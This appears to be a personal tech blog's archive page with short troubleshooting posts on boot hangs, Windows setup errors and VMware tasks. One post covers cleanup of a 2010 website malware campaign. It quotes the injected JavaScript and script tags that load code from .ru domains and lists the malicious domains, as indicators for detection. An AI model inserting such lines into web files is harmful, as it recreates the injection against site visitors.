Archive

Archive for the ‘Randomness’ Category

Linux based install hangs at the ISOLINUX boot screen

January 18th, 2013 5 comments

If you ever come across a bootable linux CD or USB that just hangs at the following screen:

ISOLINUX Freezes/Hangs at Bootup

I fixed it by disabling the serial port in BIOS under Integrated Peripherals. Hopefully this helps saves someone from the amount of time wasted from burning and re-burning a bunch of CDs/DVDs, reformatting a bunch of USB drives, and hairloss.

Let me know if that works for you or if you found another fix in the comments below.

 

Categories: Bootable, Bug Fix, How To, ISOLINUX, Linux, Randomness Tags:

Installing Windows Server 2012 or Windows 8 Error: We couldn’t create a new partition or locate an existing one. For more information, see the Setup log files.

January 17th, 2013 4 comments

If you ever come across the following error on the partition screen while going through the installer for Windows Server 2012, Windows 8, or Hyper-V Server:

We couldn't create a new partition or locate and existing one. For more information, see the Setup log files

We couldn’t create a new partition or locate and existing one. For more information, see the Setup log files

The simple fix that worked for me was to disable S.M.A.R.T. in the BIOS. If that does not work, you can also try deleting all partitions, click on New and create a single large partition, reboot, then try that same partition.

Hopefully either one of those work for you. Comment below and let me know if it resolves your issue or if you find any other fixes!

VCS vSphere – Check new notifications stuck on Queued – VMware vCenter Update Manager Check Notification

February 7th, 2011 37 comments

So if you have a bunch of queued items in your VMware vSphere Client Recent Tasks that say “Check new notifications” initiated by “VMware vCenter Update Manager Check Notification“, there is an easy fix. Here’s what it looks like:

To fix, all you have to do is restart the VMware vCenter Update Manager Service on your VCS server. See below:

You can also do a “net stop vmware-ufad-vci” then a “net start vmware-ufad-vci” as well. Let me know if this works out for you! 🙂

Categories: ESX, How To, Randomness, Security, VIClient, VMware Tags:

Getting pocketbloke.ru, inkrainbow.ru, pantsletter.ru JavaScript and PHP malware code injection hacks/infection? Get the fix here!

August 17th, 2010 124 comments

I have put together a PHP script to automatically remove all traces of this malicious code from your website. All you have to do is upload the script to the root of your web directory then access the page with any browser. I’ve built in many features including folder and file recursion, file extension filtering, automatic file backups, and two modes of operation:  search only and search and fix.

Click here to see the .RU Removal Script in action! (demo)

or…

Click here for the .RU Removal Script Source Code

or here for it on PasteBin

Let me know in the comments if it works for you or if you have any feature requests!

Thanks to everyone commenting below, we have found out that malware on your PC is stealing your FTP credentials to websites you have access to. They have an automatic script that will login to your site using FTP and append a link to PHP and JS files containing their malicious code.

It looks like this in JavaScript files:

document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/
Template.js"></scri'+'pt>');

PHP or HTML files contain the following at the end:

<script type="text/javascript" src="http://inkrainbow.ru/Template.js"></script>
<!--3848d52fcd665b3d7d96c22e5b6a5451-->

Here is a short list of some domain names that we’ve come across…

Known Malicious Domains:

  • pocketbloke.ru
  • inkrainbow.ru
  • pantsletter.ru
  • fightkid.ru
  • shirtdifficulty.ru
  • casechick.ru
  • obscurewax.ru
  • nuttypiano.com
  • Many others… (comment domains you find below)

STEPS TO TAKE TO REMOVE THE THREAT:

  1. Run MalwareBytes and get rid of anything on your machine
  2. Uninstall your FTP client
  3. Change your FTP passwords
  4. Update JAVA – According to this CERT KB
  5. Remove all traces of the scripts from your domains

UPDATE (8/26/2010): Now more than just .RU are involved which means the script in its current state won’t detect it. Working on a new way to detect this issue. Any ideas? Comment below.

Categories: Malware, PHP, Randomness, Security Tags:

First Post!

February 20th, 2009 No comments

So I finally started to post something. Might not be much yet but I have a list of posts I would like to knock out here in the next couple months. Here’s a teaser:

  • X10 Controlled Christmas Lights
  • pfSense VMs
  • Open File Security Warning in XP
  • Many PHP and Ajax Scripts
  • VMware Randomness

Oh, and I’ll take requests too!

Categories: Randomness Tags: